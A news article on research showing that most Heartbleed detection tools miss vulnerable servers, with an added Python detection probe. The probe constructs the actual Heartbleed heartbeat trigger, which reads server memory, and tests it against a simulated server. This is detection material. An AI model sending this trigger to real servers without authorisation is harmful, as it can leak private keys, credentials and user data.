
Crisis deepens as research shows nearly all Heartbleed detection tools are failing

A cybersecurity consultancy has warned that most of the tools designed to detect the Heartbleed vulnerability are flawed and cannot reliably find the bug on affected websites.

The Heartbleed bug, which affects OpenSSL, the most widely used TLS library on the web, has left hundreds of thousands of websites scrambling to fix their security.


In the panic that followed, a wave of detection tools appeared, each promising to tell site operators whether their servers were affected.

According to London-based security consultancy Hut3, however, 95 per cent of the most popular of these tools are unreliable.

Most of the tools Hut3 checked rely on detection code that is itself buggy. Even the checkers published by large companies such as McAfee and LastPass were found to be flawed.

"A lot of companies out there will be saying they've run the free web tool and they're fine, when they're not," Hut3's Edd Hardy told The Guardian. "There's absolute panic. We're getting calls late at night going 'can you test everything?'."

The main issue with the Heartbleed detectors is that most attempt the TLS handshake with only one protocol version, TLSv1.1 (a TLS version, not a version of OpenSSL). A server that does not support TLSv1.1 will either reject the connection with an alert or respond by selecting a different version.

The flawed 95 per cent, says Hut3, do not handle either response: they treat any handshake that does not go as scripted as evidence that the server is not vulnerable, which is a false negative.


A second telling problem, Hardy said, is that some tools simply give up on slow Internet connections. A server response delayed by the connection is treated as no response at all, and no response is reported as "not vulnerable", so a vulnerable server on a slow link is cleared as well.
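The two failure modes above, a single hard-coded TLS version and a timeout read as "safe", are both decisions in the checker's logic, and both are fixable. The probe below is an added example written for this article; it is not Hut3's tool, nor any vendor's checker, nor code from the original page. It goes beyond the text in two ways: it offers TLSv1.2, TLSv1.1 and TLSv1.0 in turn, retrying when the server answers a ClientHello with a version-related alert, and it sends a well-formed heartbeat as a control before the malformed one, so that a late or missing reply can be separated from a patched server that silently discards the malformed request. The record layouts follow the TLS 1.0 to 1.2 record format and the RFC 6520 heartbeat extension; the 0x4000 claimed length with an empty payload is the widely published Heartbleed trigger. `SimulatedServer` is a constructed stand-in for the network so the code runs offline, and `naive_probe` reproduces the flawed pattern the article describes for comparison. The names `probe`, `naive_probe`, `SimulatedServer` and the verdict strings are assumptions of this example.

```python
import struct

TLS_VERSIONS = [("TLSv1.2", 0x0303), ("TLSv1.1", 0x0302), ("TLSv1.0", 0x0301)]  # tried in this order
CT_ALERT, CT_HANDSHAKE, CT_HEARTBEAT = 21, 22, 24
HB_REQUEST, HB_RESPONSE = 1, 2
VERSION_ALERTS = {bytes([40]), bytes([70])}  # handshake_failure, protocol_version

def record(ctype, version, body):
    """TLS record: content type (1 byte), protocol version (2), length (2), body."""
    return struct.pack("!BHH", ctype, version, len(body)) + body

def client_hello(version):
    """Minimal ClientHello: one cipher suite plus the heartbeat extension (type 0x000f,
    mode peer_allowed_to_send); without that extension no heartbeat is ever answered."""
    ext = struct.pack("!HHB", 0x000F, 1, 1)
    body = (struct.pack("!H", version) + b"\x00" * 32   # client version, random
            + b"\x00"                                   # empty session id
            + struct.pack("!HH", 2, 0x002F)             # TLS_RSA_WITH_AES_128_CBC_SHA
            + b"\x01\x00"                               # null compression only
            + struct.pack("!H", len(ext)) + ext)
    return record(CT_HANDSHAKE, version, b"\x01" + len(body).to_bytes(3, "big") + body)

def heartbeat_request(version, claimed_len, payload=b""):
    """Heartbeat request. The Heartbleed trigger is claimed_len=0x4000 with an empty
    payload: unpatched OpenSSL copies 16 KiB of adjacent memory into its reply."""
    return record(CT_HEARTBEAT, version, struct.pack("!BH", HB_REQUEST, claimed_len) + payload)

def parse_records(data):
    """Split a byte string into (content_type, version, body) tuples."""
    out, i = [], 0
    while i + 5 <= len(data):
        ctype, ver, length = struct.unpack("!BHH", data[i:i + 5])
        out.append((ctype, ver, data[i + 5:i + 5 + length]))
        i += 5 + length
    return out

def probe(connect):
    """connect() returns a connection with send(bytes) and recv() -> bytes, where
    recv() returns None on timeout or close. Returns (verdict, reason)."""
    for name, ver in TLS_VERSIONS:
        conn = connect()
        conn.send(client_hello(ver))
        data = conn.recv()
        if data is None:
            return "inconclusive", f"no answer to ClientHello over {name}"
        recs = parse_records(data)
        if any(c == CT_ALERT and b[1:2] in VERSION_ALERTS for c, _, b in recs):
            continue  # version refused: offer the next one instead of reporting "safe"
        if not any(c == CT_HANDSHAKE for c, _, _ in recs):
            return "inconclusive", f"unexpected reply to ClientHello over {name}"
        # Control probe: a well-formed heartbeat (claimed length matches, 16-byte padding).
        conn.send(heartbeat_request(ver, 4, b"ping" + b"\x00" * 16))
        if conn.recv() is None:
            return "inconclusive", f"well-formed heartbeat unanswered over {name} (slow link or heartbeats off)"
        conn.send(heartbeat_request(ver, 0x4000))
        data = conn.recv()
        if data is None:  # answers good heartbeats but drops the malformed one: patched behaviour
            return "not vulnerable", f"malformed heartbeat silently dropped over {name}"
        for c, _, body in parse_records(data):
            if c == CT_HEARTBEAT and body[:1] == bytes([HB_RESPONSE]) and len(body) > 3:
                return "vulnerable", f"{len(body) - 3} bytes returned for an empty payload over {name}"
        return "inconclusive", f"unrecognised reply to malformed heartbeat over {name}"
    return "inconclusive", "server accepted none of the offered TLS versions"

def naive_probe(connect):
    """The flawed pattern the article describes: one hard-coded TLS version, and
    anything other than a leaking reply (version alert, timeout) reported as safe."""
    conn = connect()
    conn.send(client_hello(0x0302))
    conn.recv()
    conn.send(heartbeat_request(0x0302, 0x4000))
    for c, _, body in parse_records(conn.recv() or b""):
        if c == CT_HEARTBEAT and len(body) > 3:
            return "vulnerable"
    return "not vulnerable"

class SimulatedServer:
    """Constructed stand-in for the network so the probe runs offline: speaks one TLS
    version, closes on a version mismatch, leaks (vulnerable=True) or drops malformed
    heartbeats as a patched server does; silent=True never answers (a dead slow link)."""
    def __init__(self, version, vulnerable, silent=False):
        self.version, self.vulnerable, self.silent = version, vulnerable, silent
        self.last, self.closed = b"", False
    def send(self, data):
        self.last = data
    def recv(self):
        if self.silent or self.closed:
            return None
        ctype, ver, body = parse_records(self.last)[0]
        if ctype == CT_HANDSHAKE:
            if ver != self.version:
                self.closed = True
                return record(CT_ALERT, ver, bytes([2, 70]))  # fatal protocol_version
            return record(CT_HANDSHAKE, ver, b"\x02" + b"\x00" * 3)  # stand-in ServerHello
        claimed = struct.unpack("!H", body[1:3])[0]
        if 3 + claimed + 16 > len(body) and not self.vulnerable:
            return None  # malformed request discarded, exactly as a patched server does
        echoed = body[3:3 + claimed].ljust(claimed, b"M")  # "M" stands in for leaked memory
        return record(CT_HEARTBEAT, ver, struct.pack("!BH", HB_RESPONSE, claimed) + echoed + b"\x00" * 16)
```

Against a simulated server that is vulnerable but only speaks TLSv1.0, `probe` returns `("vulnerable", "16400 bytes returned for an empty payload over TLSv1.0")` while `naive_probe` returns `"not vulnerable"`, the exact false negative described above; a silent server makes `probe` answer "inconclusive" where the naive checker again says "not vulnerable". To run this against a real host you are authorised to test, supply a `connect` that opens a socket with `settimeout`, reads with `recv`, and returns `None` on `socket.timeout`; the verdicts are then a starting point, not a substitute for checking the OpenSSL version on the server itself.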

"It is yet another symptom of the 'hit the ground running' approach that has characterised the response to this vulnerability," said Rik Ferguson, vice president of security research at Trend Micro.